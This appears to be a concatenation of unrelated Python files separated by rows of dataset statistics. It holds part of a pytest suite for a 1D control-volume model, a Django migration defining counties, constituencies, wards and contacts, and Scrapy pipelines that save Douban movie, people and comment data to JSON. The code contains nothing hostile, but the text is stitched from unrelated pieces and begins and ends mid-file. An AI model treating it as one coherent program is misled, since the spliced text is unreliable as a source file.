m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_pressure_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 1
assert isinstance(m.fs.cv.pressure, Var) # Reference to state block pressure
assert isinstance(m.fs.cv.pressure_dx, DerivativeVar)
with pytest.raises(KeyError):
assert m.fs.cv.pressure_balance[0, 0]
assert type(m.fs.cv.pressure_balance[0, 1]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_pressure_balances_default_FFD():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "FORWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_pressure_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 1
assert isinstance(m.fs.cv.pressure, Var) # Reference to state block pressure
assert isinstance(m.fs.cv.pressure_dx, DerivativeVar)
with pytest.raises(KeyError):
assert m.fs.cv.pressure_balance[0, 1]
assert type(m.fs.cv.pressure_balance[0, 0]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_pressure_balances_deltaP():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_pressure_balances(has_pressure_change=True)
assert isinstance(mb, Constraint)
assert len(mb) == 1
assert isinstance(m.fs.cv.deltaP, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_pressure_balances_custom_term():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time)
def custom_method(t, x):
return m.fs.cv.test_var[t]*units.Pa/units.m
mb = m.fs.cv.add_total_pressure_balances(custom_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 1
assert_units_consistent(m)
# -----------------------------------------------------------------------------
# Test unsupported momentum balance types
@pytest.mark.unit
def test_add_phase_pressure_balances():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(BalanceTypeNotSupportedError):
m.fs.cv.add_phase_pressure_balances()
@pytest.mark.unit
def test_add_phase_momentum_balances():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(BalanceTypeNotSupportedError):
m.fs.cv.add_phase_momentum_balances()
@pytest.mark.unit
def test_add_total_momentum_balances():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(BalanceTypeNotSupportedError):
m.fs.cv.add_total_momentum_balances()
# -----------------------------------------------------------------------------
# Test model checks, initialize and release_state
@pytest.mark.unit
def test_model_checks():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.model_check()
for t in m.fs.time:
for x in m.fs.cv.length_domain:
assert m.fs.cv.properties[t, x].check is True
assert m.fs.cv.reactions[t, x].check is True
@pytest.mark.unit
def test_initialize():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.initialize()
for t in m.fs.time:
for x in m.fs.cv.length_domain:
assert m.fs.cv.properties[t, x].init_test is True
assert m.fs.cv.reactions[t, x].init_test is True
@pytest.mark.unit
def test_report():
# Test that calling report method on a 1D control volume returns a
# NotImplementedError to inform the user that we don't support reports
# on 1D models yet. This is because it is difficult to concisely report
# distributed data.
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
with pytest.raises(NotImplementedError):
m.fs.cv.report()
| 35.925561
| 81
| 0.653336
| 14,896
| 120,171
| 5.043569
| 0.024235
| 0.063411
| 0.051977
| 0.042913
| 0.954997
| 0.951257
| 0.942046
| 0.929029
| 0.912324
| 0.898455
| 0
| 0.00653
| 0.212472
| 120,171
| 3,344
| 82
| 35.936304
| 0.787326
| 0.02935
| 0
| 0.861834
| 0
| 0
| 0.147237
| 0.067562
| 0
| 0
| 0
| 0
| 0.116139
| 1
| 0.059672
| false
| 0
| 0.004806
| 0.007609
| 0.072887
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
606a39fc486ac3e25bc8fcca5c8447b379141abf
| 21,401
|
py
|
Python
|
common/migrations/0001_initial.py
|
Jenks18/mfl_api
|
ecbb8954053be06bbcac7e1132811d73534c78d9
|
[
"MIT"
] | 19
|
2015-04-16T09:37:08.000Z
|
2022-02-10T11:50:30.000Z
|
common/migrations/0001_initial.py
|
Jenks18/mfl_api
|
ecbb8954053be06bbcac7e1132811d73534c78d9
|
[
"MIT"
] | 125
|
2015-03-26T14:05:49.000Z
|
2020-05-14T08:16:50.000Z
|
common/migrations/0001_initial.py
|
Jenks18/mfl_api
|
ecbb8954053be06bbcac7e1132811d73534c78d9
|
[
"MIT"
] | 39
|
2015-04-15T09:17:33.000Z
|
2022-03-28T18:08:16.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import common.models.base
import django.db.models.deletion
import common.models.model_declarations
import django.utils.timezone
from django.conf import settings
import common.fields
import uuid
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Constituency',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('name', models.CharField(help_text=b'Name of the administrative unit e.g Nairobi', max_length=100)),
('code', common.fields.SequenceField(help_text=b'A unique_code 4 digit number representing the region.', unique=True, blank=True)),
],
options={
'ordering': ('-updated', '-created'),
'abstract': False,
'verbose_name_plural': 'constituencies',
'default_permissions': ('add', 'change', 'delete', 'view'),
},
bases=(common.models.base.SequenceMixin, models.Model),
),
migrations.CreateModel(
name='Contact',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('contact', models.CharField(help_text=b'The actual contact of the person e.g test@mail.com, 07XXYYYZZZ', max_length=100)),
],
options={
'ordering': ('-updated', '-created'),
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view'),
},
),
migrations.CreateModel(
name='ContactType',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('name', models.CharField(help_text=b'A short name, preferably 6 characters long, representing a certain type of contact e.g EMAIL', unique=True, max_length=100)),
('description', models.TextField(help_text=b'A brief description of the contact type.', null=True, blank=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-updated', '-created'),
'default_permissions': ('add', 'change', 'delete', 'view'),
'abstract': False,
},
),
migrations.CreateModel(
name='County',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('name', models.CharField(help_text=b'Name of the administrative unit e.g Nairobi', max_length=100)),
('code', common.fields.SequenceField(help_text=b'A unique_code 4 digit number representing the region.', unique=True, blank=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-updated', '-created'),
'default_permissions': ('add', 'change', 'delete', 'view'),
'abstract': False,
'verbose_name_plural': 'counties',
},
bases=(common.models.base.SequenceMixin, models.Model),
),
migrations.CreateModel(
name='DocumentUpload',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('name', models.CharField(unique=True, max_length=255)),
('description', models.TextField(null=True, blank=True)),
('fyl', models.FileField(upload_to=b'')),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-updated', '-created'),
'default_permissions': ('add', 'change', 'delete', 'view'),
'abstract': False,
},
),
migrations.CreateModel(
name='PhysicalAddress',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('nearest_landmark', models.TextField(help_text=b'well-known physical features /structure that can be used to simplify directions to a given place. e.g town market or village ', null=True, blank=True)),
('plot_number', models.CharField(help_text=b'This is the same number found on the title deeds of thepiece of land on which this facility is located', max_length=100, null=True, blank=True)),
('location_desc', models.TextField(help_text=b'This field allows a more detailed description of the location', null=True, blank=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-updated', '-created'),
'default_permissions': ('add', 'change', 'delete', 'view'),
'abstract': False,
'verbose_name_plural': 'physical addresses',
},
),
migrations.CreateModel(
name='SubCounty',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('name', models.CharField(help_text=b'Name of the administrative unit e.g Nairobi', max_length=100)),
('code', common.fields.SequenceField(help_text=b'A unique_code 4 digit number representing the region.', unique=True, blank=True)),
('county', models.ForeignKey(to='common.County', on_delete=django.db.models.deletion.PROTECT)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-updated', '-created'),
'default_permissions': ('add', 'change', 'delete', 'view'),
'abstract': False,
},
bases=(common.models.base.SequenceMixin, models.Model),
),
migrations.CreateModel(
name='Town',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('name', models.CharField(help_text=b'Name of the town', max_length=255, unique=True, null=True, blank=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-updated', '-created'),
'default_permissions': ('add', 'change', 'delete', 'view'),
'abstract': False,
},
),
migrations.CreateModel(
name='UserConstituency',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('constituency', models.ForeignKey(to='common.Constituency')),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('user', models.ForeignKey(related_name='user_constituencies', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'user constituencies',
},
bases=(common.models.model_declarations.UserAdminAreaLinkageMixin, models.Model),
),
migrations.CreateModel(
name='UserContact',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('contact', models.ForeignKey(to='common.Contact')),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('user', models.ForeignKey(related_name='user_contacts', on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-updated', '-created'),
'default_permissions': ('add', 'change', 'delete', 'view'),
'abstract': False,
},
),
migrations.CreateModel(
name='UserCounty',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('county', models.ForeignKey(to='common.County', on_delete=django.db.models.deletion.PROTECT)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('user', models.ForeignKey(related_name='user_counties', on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-updated', '-created'),
'default_permissions': ('add', 'change', 'delete', 'view'),
'abstract': False,
'verbose_name_plural': 'user_counties',
},
bases=(common.models.model_declarations.UserAdminAreaLinkageMixin, models.Model),
),
migrations.CreateModel(
name='Ward',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(default=django.utils.timezone.now)),
('deleted', models.BooleanField(default=False)),
('active', models.BooleanField(default=True, help_text=b'Indicates whether the record has been retired?')),
('search', models.CharField(max_length=255, null=True, editable=False, blank=True)),
('name', models.CharField(help_text=b'Name of the administrative unit e.g Nairobi', max_length=100)),
('code', common.fields.SequenceField(help_text=b'A unique_code 4 digit number representing the region.', unique=True, blank=True)),
('constituency', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='common.Constituency', help_text=b'The constituency where the ward is located.')),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
('updated_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-updated', '-created'),
'default_permissions': ('add', 'change', 'delete', 'view'),
'abstract': False,
},
bases=(common.models.base.SequenceMixin, models.Model),
),
migrations.AddField(
model_name='physicaladdress',
name='town',
field=models.ForeignKey(blank=True, to='common.Town', help_text=b'The town where the entity is located e.g Nakuru', null=True),
),
migrations.AddField(
model_name='physicaladdress',
name='updated_by',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='contact',
name='contact_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='common.ContactType', help_text=b'The type of contact that the given contact is e.g email or phone number'),
),
migrations.AddField(
model_name='contact',
name='created_by',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='contact',
name='updated_by',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='constituency',
name='county',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='common.County', help_text=b'Name of the county where the constituency is located'),
),
migrations.AddField(
model_name='constituency',
name='created_by',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='constituency',
name='updated_by',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.PROTECT, default=common.models.base.get_default_system_user_id, to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='contact',
unique_together=set([('contact', 'contact_type')]),
),
migrations.AlterUniqueTogether(
name='constituency',
unique_together=set([('name', 'county')]),
),
]
| 67.939683
| 218
| 0.62941
| 2,302
| 21,401
| 5.698523
| 0.079931
| 0.042689
| 0.034152
| 0.053667
| 0.864995
| 0.851959
| 0.824745
| 0.824745
| 0.824745
| 0.824745
| 0
| 0.005052
| 0.232326
| 21,401
| 314
| 219
| 68.156051
| 0.793414
| 0.000981
| 0
| 0.772727
| 0
| 0.003247
| 0.181495
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029221
| 0
| 0.038961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
608d25f2a8f2b2c946ba00dacdd868f4bba234c8
| 8,684
|
py
|
Python
|
douban_movie/douban_movie/pipelines.py
|
ShihaoYing/douban250
|
abbe18b9c2cd4b0b4b5b128d79ac9ca949feaebc
|
[
"BSD-2-Clause"
] | null | null | null |
douban_movie/douban_movie/pipelines.py
|
ShihaoYing/douban250
|
abbe18b9c2cd4b0b4b5b128d79ac9ca949feaebc
|
[
"BSD-2-Clause"
] | null | null | null |
douban_movie/douban_movie/pipelines.py
|
ShihaoYing/douban250
|
abbe18b9c2cd4b0b4b5b128d79ac9ca949feaebc
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy import signals
import json
import codecs
from twisted.enterprise import adbapi
from datetime import datetime
from hashlib import md5
class MovieItemPipeline(object):
def __init__(self):
self.file = codecs.open('./data/movie_item.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
################ People ####################
class MovieXPeoplePipeline1040(object):
def __init__(self):
self.file = codecs.open('./data/movie_Xpeople1040.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MoviePeoplePipeline5000(object):
def __init__(self):
self.file = codecs.open('./data/movie_people5000.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MoviePeoplePipeline10000(object):
def __init__(self):
self.file = codecs.open('./data/movie_people10000.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MoviePeoplePipeline15000(object):
def __init__(self):
self.file = codecs.open('./data/movie_people15000.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MoviePeoplePipeline20000(object):
def __init__(self):
self.file = codecs.open('./data/movie_people20000.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MoviePeoplePipeline25000(object):
def __init__(self):
self.file = codecs.open('./data/movie_people25000.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MoviePeoplePipeline30000(object):
def __init__(self):
self.file = codecs.open('./data/movie_people30000.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MoviePeoplePipeline35000(object):
def __init__(self):
self.file = codecs.open('./data/movie_people35000.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MoviePeoplePipeline40000(object):
def __init__(self):
self.file = codecs.open('./data/movie_people40000.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
################ Comment ####################
class MovieCommentPipeline20(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment20.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline40(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment40.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline60(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment60.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline80(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment80.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline100(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment100.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def spider_closed(self, spider):
self.file.close()
class MovieCommentPipeline120(object):
def __init__(self):
self.file = codecs.open('./data/movie_comment120.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
